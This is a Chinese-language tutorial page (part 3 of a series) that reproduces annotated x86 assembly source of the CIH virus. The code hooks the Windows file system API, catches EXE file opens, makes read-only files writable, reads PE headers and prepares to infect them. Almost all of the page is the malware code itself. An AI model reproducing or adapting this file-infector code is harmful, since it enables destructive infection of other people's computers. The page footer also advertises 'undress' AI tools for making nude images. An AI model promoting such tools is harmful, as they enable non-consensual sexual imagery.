首页 后端开发 php教程 病毒程序源码实例剖析-CIH病毒[3]

病毒程序源码实例剖析-CIH病毒[3]

Jan 17, 2017 am 11:16 AM

jmp ExitRing0Init ;退出Ring0级
  
  ;合并后的代码大小
  CodeSizeOfMergeVirusCodeSection = offset $ 
  
  ;新的IFSMgr_InstallFileSystemApiHook功能调用 
  InstallFileSystemApiHook:
  push ebx 
  
  call @4 
  
  @4: 
  pop ebx ;获得当前指令的偏移地址 
  add ebx, FileSystemApiHook-@4 ;加上偏移的差等于FileSystemApiHook的偏移 
  
  push ebx 
  int 20h ;调用Vxd移去指向FileSystemApiHook的钩子 
  IFSMgr_RemoveFileSystemApiHook = $ 
  dd 00400068h ;使用eax、ecx、edx和flags寄存器
  pop eax 
   
  ;调用原来的IFSMgr_InstallFileSystemApiHook功能连接FileSystemApiHook钩子
  push dword ptr [esp+8] 
  call OldInstallFileSystemApiHook-@3[ebx] 
  
  pop ecx 
  push eax 
  push ebx 
  
  call OldInstallFileSystemApiHook-@3[ebx] 
  pop ecx 
  
  mov dr0, eax ;调整OldFileSystemApiHook地址 
  
  pop eax 
  pop ebx 
  
  ret 
  
  OldInstallFileSystemApiHook dd ;原来的InstallFileSystemApiHook调用地址 
  
  ;IFSMgr_FileSystemHook调用入口
  FileSystemApiHook: 
  @3 = FileSystemApiHook 
  
  push ad ;保存寄存器 
  
  call @5 
  
  @5: 
  pop esi ; mov esi, offset ;esi为当前指令的偏移 
  add esi, VirusGameDataStartAddress-@5 ;esi为FileSystemApiHook的偏移
  ;加VirusGameDataStartAddress的偏移之差等于VirusGameDataStartAddress的偏移
  
  ;测试“忙”标志,“忙”则转到pIFSFunc
  test byte ptr (OnBusy-@6)[esi], 01h 
  jnz pIFSFunc 
  
  ;如果没有打开文件,则转到prevhook 
  lea ebx, [esp+20h+04h+04h] ;ebx为FunctionNum的地址
  
  ;文件系统钩子的调用格式如下 
  ;FileSystemApiHookFunction(pIFSFunc FSDFnAddr, int FunctionNum, int Drive,
  ;int ResourceFlags, int CodePage, pioreq pir)
  
  ;判断此次调用是否是为了打开文件,如果不是就跳到前一个文件钩子去
  cmp dword ptr [ebx], 00000024h 
  jne prevhook 
  
  inc byte ptr (OnBusy-@6)[esi] ; Enable OnBusy ;设置“忙”标志为“忙” 
  
  ;获得文件路径指定的驱动器号,然后把驱动器名称放到FileNameBuffer中
  ;如果驱动器号为03h,则说明该盘是C盘
  mov esi, offset FileNameBuffer 
  add esi, FileNameBuffer-@6 ;esi指向FileNameBuffer 
  
  push esi ;保存
  mov al, [ebx+04h] ;ebx+4为磁盘号的地址 
  
  ;是否UNC(universal naming conventions)地址,如果是就转CallUniToBCSPath
  cmp al, 0ffh 
  je CallUniToBCSPath 
  
  add al, 40h 
  mov ah, ':' 
  
  mov [esi], eax ;处理成"X:"的形式,即在盘符后面增加一个冒号
  
  inc esi 
  inc esi 
  
  ;把Canonicalized Unicode的字符转换为普通的BCS字符集,调用方法 
  ;UniToBCSPath(unsigned char * pBCSPath, ParsedPath * pUniPath, 
  ;unsigned int maxLength, int charSet)
  CallUniToBCSPath: 
  push 00000000h ;字符集 
  push FileNameBufferSize ;字符长度 
  mov ebx, [ebx+10h] 
  mov eax, [ebx+0ch] 
  add eax, 04h 
  push eax ;Uni字符首址 
  push esi ;BCS字符首址 
  int 20h ;调用UniToBCSPath 
  UniToBCSPath = $ 
  dd 00400041h 调用id 
  add esp, 04h*04h 
  
  ;判断文件是否是EXE文件
  cmp [esi+eax-04h], 'EXE.' 
  pop esi 
  jne DisableOnBusy 
  
  IF DEBUG 
  
  ;以下信息为调试用
  cmp [esi+eax-06h], 'KCUF' 
  jne DisableOnBusy 
  
  ENDIF 
  
  ;判断文件是否存在,如果不存在,则转向DisableOnBusy处
  cmp word ptr [ebx+18h], 01h 
  jne DisableOnBusy 
  
  ;获得文件属性
  mov ax, 4300h 
  int 20h ;调用IFSMgr_Ring0_FileIO获得文件属性的功能 
  IFSMgr_Ring0_FileIO = $ 
  dd 00400032h ;调用号 
  
  jc DisableOnBusy 
  push ecx 
  
  ;获得IFSMgr_Ring0_FileIO地址
  mov edi, dword ptr (IFSMgr_Ring0_FileIO-@7)[esi] 
  mov edi, [edi] 
  
  ;判断是否只读文件,如果是,则修改文件属性,否则转向OpenFile处
  test cl, 01h 
  jz OpenFile 
  
  mov ax, 4301h 
  xor ecx, ecx 
  call edi ;调用IFSMgr_Ring0_FileIO修改文件属性的功能,使文件可写
  
  ;打开文件
  OpenFile: 
  xor eax, eax 
  mov ah, 0d5h 
  xor ecx, ecx ;文件属性 
  xor edx, edx 
  inc edx 
  mov ebx, edx 
  inc ebx ;esi为文件名首址 
  call edi ;调用IFSMgr_Ring0_FileIO打开文件的功能 
  
  xchg ebx, eax ;在ebx中保存文件句柄 
  
  ;是否需要恢复文件属性(有写属性就不需要恢复了)
  pop ecx 
  pushf 
  
  test cl, 01h 
  jz IsOpenFileOK 
  
  ;恢复文件属性
  mov ax, 4301h
  call edi ;恢复文件属性 
  
  ;文件打开是否成功,如果不成功,则转向DisableOnBusy处
  IsOpenFileOK: 
  popf 
  jc DisableOnBusy
  
  ;文件打开成功
  push esi ;把文件名数据区首址入栈 
  
  pushf ;CF = 0,保存标志位 
  
  add esi, DataBuffer-@7 ;esi指向数据区首址 
  
  ;获得新文件头的偏移
  xor eax, eax 
  mov ah, 0d6h ;IFSMgr_Ring0_FileIO的读文件功能号(R0_READFILE) 
  
  ;为了达到使病毒代码长度最少的目的,把eax保存到ebp
  mov ebp, eax 
  
  push 00000004h ;读取4个字节 
  pop ecx 
  push 0000003ch ;读取DOS文件头偏移3ch处的Windows文件头首部偏移 
  pop edx 
  call edi ;读文件到esi 
  
  mov edx, [esi] ;Windows文件头首部偏移放到edx 
  
  ; 获得图形文件头的PE标记和已感染标记
  dec edx 
  mov eax, ebp ;功能号 
  call edi ;读文件到esi 
  
  ;判断是否是PE,如果是,进一步判断是否已经感染过
  ;判断是否是WinZip自解压文件,如果是,就不感染 Self-Extractor * 
  cmp dword ptr [esi], 00455000h ;判断是否是PE文件(标志"PE/0/0") 
  jne CloseFile ;不是就关闭文件 
  
  ;如果是PE文件,且没有被感染,就开始感染该文件
  push ebx ;保存文件句柄 
  push 00h 
  
  ;设置病毒感染标记
  push 01h ;标记大小
  push edx ;edx指向PE文件头偏移00h 
  push edi ;edi为IFSMgr_Ring0_FileIO的地址 
  
  mov dr1, esp ;保存esp
  
  ;设置 NewAddressOfEntryPoint入口
  push eax 
  
  ;读文件头
  mov eax, ebp 
  mov cl, SizeOfImageHeaderToRead ;要读2个字节 
  add edx, 07h ;PE文件头+07h为NumberOfSections(块个数) 
  call edi ;读出NumberOfSections(块个数)到esi 
  
  lea eax, (AddressOfEntryPoint-@8)[edx] 
  push eax ;文件指针 
  
  lea eax, (NewAddressOfEntryPoint-@8)[esi] 
  push eax ; 缓冲区地址
  
  ;把edx的值放到文件病毒代码块表表的开始位置
  movzx eax, word ptr (SizeOfOptionalHeader-@8)[esi] 
  lea edx, [eax+edx+12h] ;edx为病毒代码块表的偏移 
  
  ;获得病毒代码块表的大小
  mov al, SizeOfScetionTable ;每个块表项的大小
  
  mov cl, (NumberOfSections-@8)[esi] 
  
  mul cl ;每个块表项乘以块个数等于块表大小 
  
  ; 设置病毒代码块表 
  lea esi, (StartOfSectionTable-@8)[esi] ;esi指向块表首址(在病毒动态数据区中)

以上就是病毒程序源码实例剖析-CIH病毒[3]的内容,更多相关内容请关注PHP中文网(www.php.cn)!


本站声明
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

热AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智能驱动的应用程序,用于创建逼真的裸体照片

AI Clothes Remover

AI Clothes Remover

用于从照片中去除衣服的在线人工智能工具。

Undress AI Tool

Undress AI Tool

免费脱衣服图片

Clothoff.io

Clothoff.io

AI脱衣机

AI Hentai Generator

AI Hentai Generator

免费生成ai无尽的。

热门文章

R.E.P.O.能量晶体解释及其做什么(黄色晶体)
1 个月前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.最佳图形设置
1 个月前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.如果您听不到任何人,如何修复音频
1 个月前 By 尊渡假赌尊渡假赌尊渡假赌
R.E.P.O.聊天命令以及如何使用它们
1 个月前 By 尊渡假赌尊渡假赌尊渡假赌

热工具

记事本++7.3.1

记事本++7.3.1

好用且免费的代码编辑器

SublimeText3汉化版

SublimeText3汉化版

中文版,非常好用

禅工作室 13.0.1

禅工作室 13.0.1

功能强大的PHP集成开发环境

Dreamweaver CS6

Dreamweaver CS6

视觉化网页开发工具

SublimeText3 Mac版

SublimeText3 Mac版

神级代码编辑软件(SublimeText3)

在PHP API中说明JSON Web令牌(JWT)及其用例。 在PHP API中说明JSON Web令牌(JWT)及其用例。 Apr 05, 2025 am 12:04 AM

JWT是一种基于JSON的开放标准,用于在各方之间安全地传输信息,主要用于身份验证和信息交换。1.JWT由Header、Payload和Signature三部分组成。2.JWT的工作原理包括生成JWT、验证JWT和解析Payload三个步骤。3.在PHP中使用JWT进行身份验证时,可以生成和验证JWT,并在高级用法中包含用户角色和权限信息。4.常见错误包括签名验证失败、令牌过期和Payload过大,调试技巧包括使用调试工具和日志记录。5.性能优化和最佳实践包括使用合适的签名算法、合理设置有效期、

解释PHP中晚期静态结合的概念。 解释PHP中晚期静态结合的概念。 Mar 21, 2025 pm 01:33 PM

文章讨论了PHP 5.3中引入的PHP中的晚期静态结合(LSB),从而允许静态方法的运行时分辨率调用以获得更灵活的继承。 LSB的实用应用和潜在的触摸

框架安全功能:防止漏洞。 框架安全功能:防止漏洞。 Mar 28, 2025 pm 05:11 PM

文章讨论了框架中的基本安全功能,以防止漏洞,包括输入验证,身份验证和常规更新。

描述扎实的原则及其如何应用于PHP的开发。 描述扎实的原则及其如何应用于PHP的开发。 Apr 03, 2025 am 12:04 AM

SOLID原则在PHP开发中的应用包括:1.单一职责原则(SRP):每个类只负责一个功能。2.开闭原则(OCP):通过扩展而非修改实现变化。3.里氏替换原则(LSP):子类可替换基类而不影响程序正确性。4.接口隔离原则(ISP):使用细粒度接口避免依赖不使用的方法。5.依赖倒置原则(DIP):高低层次模块都依赖于抽象,通过依赖注入实现。

自定义/扩展框架:如何添加自定义功能。 自定义/扩展框架:如何添加自定义功能。 Mar 28, 2025 pm 05:12 PM

本文讨论了将自定义功能添加到框架上,专注于理解体系结构,识别扩展点以及集成和调试的最佳实践。

如何用PHP的cURL库发送包含JSON数据的POST请求? 如何用PHP的cURL库发送包含JSON数据的POST请求? Apr 01, 2025 pm 03:12 PM

使用PHP的cURL库发送JSON数据在PHP开发中,经常需要与外部API进行交互,其中一种常见的方式是使用cURL库发送POST�...

如何在系统重启后自动设置unixsocket的权限? 如何在系统重启后自动设置unixsocket的权限? Mar 31, 2025 pm 11:54 PM

如何在系统重启后自动设置unixsocket的权限每次系统重启后,我们都需要执行以下命令来修改unixsocket的权限:sudo...

See all articles